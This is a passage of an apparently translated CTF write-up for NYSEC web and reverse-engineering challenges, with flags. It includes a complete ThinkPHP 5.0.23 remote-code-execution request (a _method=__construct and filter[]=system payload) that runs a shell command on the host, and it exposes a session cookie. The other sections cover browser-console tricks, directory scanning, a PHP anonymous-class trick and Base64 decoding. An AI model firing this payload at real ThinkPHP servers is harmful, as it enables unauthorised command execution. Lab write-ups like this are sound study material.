<span>{ 十年磨一剑-为API开发设计的高性能框架 }</span>
</div>


</body>
```

ThinkPHP 5.0.23 remote code execution (the _method=__construct request-method override with filter[]=system, so the value of server[REQUEST_METHOD] is run through system()):

```http
POST /Index?s=captcha HTTP/1.1
Host: nysec.ctf.center:34405
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
Cookie: GZCTF_Token=CfDJ8Fkqyttp2-JJrGVHVK4HFlkRcTezmAtobSBt7OmrjE-xVkZpRzFV-12CH6NuAaKJW8Pc97sjKEZ7hZgCWS9N9u7mtX9D0Svt0PwtMhq5PVR1i3BnsW8jsET2H2NAAqgP1OnIjshQCiCG9X9ebuj5hKGtXkXfklqfwhjIdUAPDdkpcLzq1S8D40PXlZy3Ns4wv4-yn9uw0fPRwcUsZeIHxKb6aGAfho5f2wVg4KceNlq-GBUF6zmk-txgycioornMoN_9BRfiSlUExQdBpwSjilTvMZiUwp967PEVNxCMCAqjOoybhJZTSd__s9bwsMWwjaJIM7Qr-kAhcE-wETn64AGUXnKxQonQ8jljNT0WAWTJzqGWdzQLi7ADtYLd8BBT37ikTIyZ_HecBIV32lsZJYbBMB2aBoAC6thMv7czM1LUPOXeKXn93zbsIxRt-z0jMsxu_WsXajqMjRLiOnzY3y6fDbPZMMIomMe23GijcAUEU4mc2ibFRemARlGzDWjaHZN8xdCIaxgLiSV1HzU8wvl3t1A_5fa08nzXgan4mUUEikmc5w9vdWIJH5974CiGU5bo83ukzWtiBnT_2L7Z3d3qscipEap8bajHo0SZtSu9YOMVNaPdctArDHDhL80kqrk4xu9oFTE_-l5Tk6JTn38EPvL4OHxvVYEIqBj60kl4TeFL1ZoJjcMGfN1iuraiSHBho-jK0ApHDdppJF3FKFK6rn3OdyCkIVUqpeTt0wUy

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=cat${IFS}/flag.txt
```

flag{54a41a77-13c5-4896-92cb-8d04aa58c32b}

Hey, What Are You Doing~~ (哎哟你干嘛~~)

Run in the browser console:

```javascript
H1 = 99999998;  // set H1 to 99999998
c();
```

Base64-decoding the output gives the flag: NYSEC{ac24adc5685ff-f6402e80bc-6fb6ae59-62aa6666}

Looks Like Something Leaked?! (貌似露了点什么?!)

A scan finds www.zip; unzipping it gives the flag.

```text
F:\gobuster_Windows_x86_64>gobuster.exe dir -u http://nysec.ctf.center:32994/ -w F:\gobuster_Windows_x86_64\vulns.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://nysec.ctf.center:32994/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: F:\gobuster_Windows_x86_64\vulns.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/www.zip (Status: 200) [Size: 554]
/.htaccess (Status: 403) [Size: 284]
Progress: 200 / 201 (99.50%)
===============================================================
Finished
===============================================================
```

flag{53f1fb40-090d-4f30-9e7c-26f93dc2774f}

Remember to Stay Anonymous~ (记得匿名哟~)

Reference: the ezphp challenge from 红明谷 2024.

It tests PHP anonymous classes: the generated class name is 'class@anonymous' + chr(0) + the path of the PHP file + ':' + the line number + '$' + a counter (0 for the first one), so the name can be supplied with a URL-encoded NUL byte:

```text
http://nysec.ctf.center:34466/?class=class@anonymous%00/var/www/html/index.php:4$0
```

flag{19e96a47-51be-4985-afc2-5d09f497c900}

Play a Little Game (玩会小游戏吧)

Run in the browser console:

```javascript
Runner.instance_.setSpeed(2147483647)
```

This yields ZmxhZ3s3ZjRmOGIwMC0yNjYyLTRhMTMtYTkyZi1mYTk3NjJjOTA5Y2F9Cg==

Base64-decoding it gives the flag: flag{7f4f8b00-2662-4a13-a92f-fa9762c909ca}

Reverse

base

The aron function mutates the Base64 alphabet. Dynamic debugging shows the processed table:

ACDEFGHIJKLMNOPQRSTUVWXYZZabcdefghijklmnopqrstuvwxyz0123456789+/

Every character in the range ('A', 'Y'] is incremented by one, so 'B' disappears from the table and 'Z' appears twice (indices 24 and 25). Decoding is therefore ambiguous wherever a 'Z' occurs in the encoded text: both values have to be tried.

```c
__int64 __fastcall aron(__int64 a1)
{
  __int64 result; // rax
  int i; // [rsp+Ch] [rbp-4h]

  if ( a1 )
  {
    // walk the NUL-terminated table in place
    for ( i = 0; ; ++i )
    {
      result = *(unsigned __int8 *)(i + a1);
      if ( !(_BYTE)result )
        break;
      // 'B'..'Y' become 'C'..'Z'; 'A' and 'Z' are left alone
      if ( *(char *)(i + a1) > 'A' && *(char *)(i + a1) <= 'Y' )
        ++*(_BYTE *)(i + a1);
    }
  }
  return result;
}
```

flag:NYSEC{Where_Did_U_Go}
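An added example (not from the writeup): encoding and decoding with the mutated table in Python, deriving the alphabet from a re-implementation of `aron` rather than a hard-coded string. The decoder handles the non-injective table: a 'Z' in the encoded text may stand for sextet 24 or 25, so every combination is tried and all candidates are returned, while a 'B' (which the table can no longer produce) is rejected. The sample inputs are constructed; the challenge's encoded flag is not reproduced on this page, so pass the string taken from the binary to custom_b64decode.

```python
import base64
import binascii
import itertools
import string

STD_ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"


def aron(table: str) -> str:
    """Python re-implementation of the binary's aron(): bytes in ('A', 'Y'] are incremented."""
    return "".join(chr(ord(c) + 1) if "A" < c <= "Y" else c for c in table)


CUSTOM_ALPHABET = aron(STD_ALPHABET)   # ACDEFGHIJKLMNOPQRSTUVWXYZZabc...789+/
_ENCODE_MAP = str.maketrans(STD_ALPHABET, CUSTOM_ALPHABET)


def custom_b64encode(data: bytes) -> str:
    """Standard base64, then sextet i is written as CUSTOM_ALPHABET[i]."""
    return base64.b64encode(data).decode().translate(_ENCODE_MAP)


def custom_b64decode(text: str, limit: int = 1024) -> list:
    """Decode with the mutated table. 'Z' sits at index 24 and 25, so each 'Z'
    is expanded both ways and every decodable candidate is returned (up to `limit`)."""
    choices = []
    for ch in text:
        if ch == "=":
            choices.append(["="])
            continue
        idx = [i for i, c in enumerate(CUSTOM_ALPHABET) if c == ch]
        if not idx:
            raise ValueError(f"{ch!r} cannot occur in this encoding (e.g. 'B' was removed)")
        choices.append([STD_ALPHABET[i] for i in idx])   # back to the standard alphabet
    results = []
    for combo in itertools.islice(itertools.product(*choices), limit):
        try:
            results.append(base64.b64decode("".join(combo)))
        except binascii.Error:
            continue      # bad padding for this combination
    return results


if __name__ == "__main__":
    # Constructed samples: 0x04 is "BA==" in standard base64, so 'C' leads here;
    # "ZA==" is ambiguous and decodes to two candidates (0x60 and 0x64)
    print(CUSTOM_ALPHABET)
    print(custom_b64encode(b"\x04"))            # CA==
    print(custom_b64decode("ZA=="))             # [b'`', b'd']
    sample = custom_b64encode(b"NYSEC{Where_Did_U_Go}")
    print(sample, custom_b64decode(sample))
```

With k ambiguous 'Z' characters there are 2^k candidates; in practice only one decodes to printable text in the flag format, which is the filter to apply when the encoded flag contains several.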

I Can't Do Logic Operations (我不会逻辑运算)

Convert each decimal value to eight hex digits and the hex to ASCII; each 32-bit value is four big-endian ASCII characters:

```python
def int_to_ascii(values):
    # each value -> 8 hex digits (4 bytes, most significant first), then bytes -> text
    hex_str = ''.join('{:08x}'.format(value) for value in values)
    ascii_str = bytearray.fromhex(hex_str).decode()
    return ascii_str


values = [
    1096770097, 1952395366, 1600270708, 1601398833,
    1716808014, 1734305335, 962749284, 828584245
]

password = int_to_ascii(values)
formatted_password = f"NYSEC{{{password}}}"
print(f"flag: {formatted_password}")
```

flag: NYSEC{A_b1t_0f_b1t_sh1fTiNg_f79bcd1c15}